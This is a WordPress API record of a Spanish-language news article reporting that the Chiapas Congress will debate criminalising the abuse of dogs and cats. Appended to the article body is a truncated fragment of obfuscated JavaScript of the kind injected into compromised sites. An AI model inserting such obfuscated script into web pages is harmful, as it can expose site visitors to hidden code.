{"id":22671,"date":"2025-06-25T03:34:54","date_gmt":"2025-06-25T03:34:54","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22671"},"modified":"2025-06-25T03:34:55","modified_gmt":"2025-06-25T03:34:55","slug":"a-partir-de-este-miercoles-chiapas-podria-tipificar-el-maltrato-animal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22671","title":{"rendered":"A partir de este mi\u00e9rcoles, Chiapas podr\u00eda tipificar el maltrato animal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000188508-1024x683.jpg\" alt=\"\" class=\"wp-image-22672\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000188508-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000188508-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000188508-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000188508-1536x1024.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000188508-2048x1365.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez-<\/p>\n\n\n\n<p>24 de junio del 2025. Tuxtla Guti\u00e9rrez.- Este mi\u00e9rcoles, el Congreso de Chiapas discutir\u00e1 una iniciativa para tipificar el maltrato animal en el C\u00f3digo Penal del estado, por lo que Chiapas podr\u00eda dejar de ser el \u00faltimo estado en legislar en la materia.<\/p>\n\n\n\n<p>La diputada Andrea Negr\u00f3n S\u00e1nchez (Movimiento Ciudadano) destac\u00f3 que, de aprobarse, esta reforma marcar\u00eda un hito en la protecci\u00f3n legal de los animales de compa\u00f1\u00eda en la entidad.<\/p>\n\n\n\n<p>&#8220;Es un avance significativo, resultado de la lucha incansable de activistas que por a\u00f1os han exigido justicia para los animales&#8221;, afirm\u00f3 Negr\u00f3n S\u00e1nchez.<\/p>\n\n\n\n<p>La iniciativa contempla sanciones administrativas y penales por agresiones, lesiones o muerte de perros y gatos, especies consideradas en esta primera etapa.<\/p>\n\n\n\n<p>Chiapas es el \u00faltimo estado del pa\u00eds en legislar sobre el tema, una deuda hist\u00f3rica que, seg\u00fan la legisladora, no hab\u00eda avanzado por falta de voluntad en pasadas legislaturas.<\/p>\n\n\n\n<p>&#8220;Hoy, gracias a la presi\u00f3n social y al trabajo de organizaciones, logramos que el tema salga de la congeladora&#8221;, se\u00f1al\u00f3.<\/p>\n\n\n\n<p>Grupos animalistas como Rescate Animal Chiapas y Voces Pro Animal han sido clave en la visibilizaci\u00f3n de casos de crueldad y en la promoci\u00f3n de la iniciativa.<\/p>\n\n\n\n<p>Mediante campa\u00f1as, protestas y acompa\u00f1amiento legislativo, lograron colocar el tema en la agenda p\u00fablica. &#8220;Este es un triunfo colectivo. Sin la voz de las protectoras, jam\u00e1s se hubiera concretado&#8221;, subray\u00f3 la diputada.<\/p>\n\n\n\n<p>Las sanciones propuestas variar\u00e1n seg\u00fan la gravedad del da\u00f1o infringido, y se invita a la ciudadan\u00eda a informarse sobre las nuevas figuras jur\u00eddicas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez- 24 de junio del 2025. Tuxtla Guti\u00e9rrez.- Este mi\u00e9rcoles, el Congreso de Chiapas discutir\u00e1 una iniciativa para tipificar el maltrato animal en el C\u00f3digo Penal del estado, por lo que Chiapas podr\u00eda dejar de ser el \u00faltimo estado en legislar en la materia. La diputada Andrea Negr\u00f3n S\u00e1nchez (Movimiento Ciudadano) destac\u00f3 que, de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22672,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-22671","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22671","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22671"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22671\/revisions"}],"predecessor-version":[{"id":22673,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22671\/revisions\/22673"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22672"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22671"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22671"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22671"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}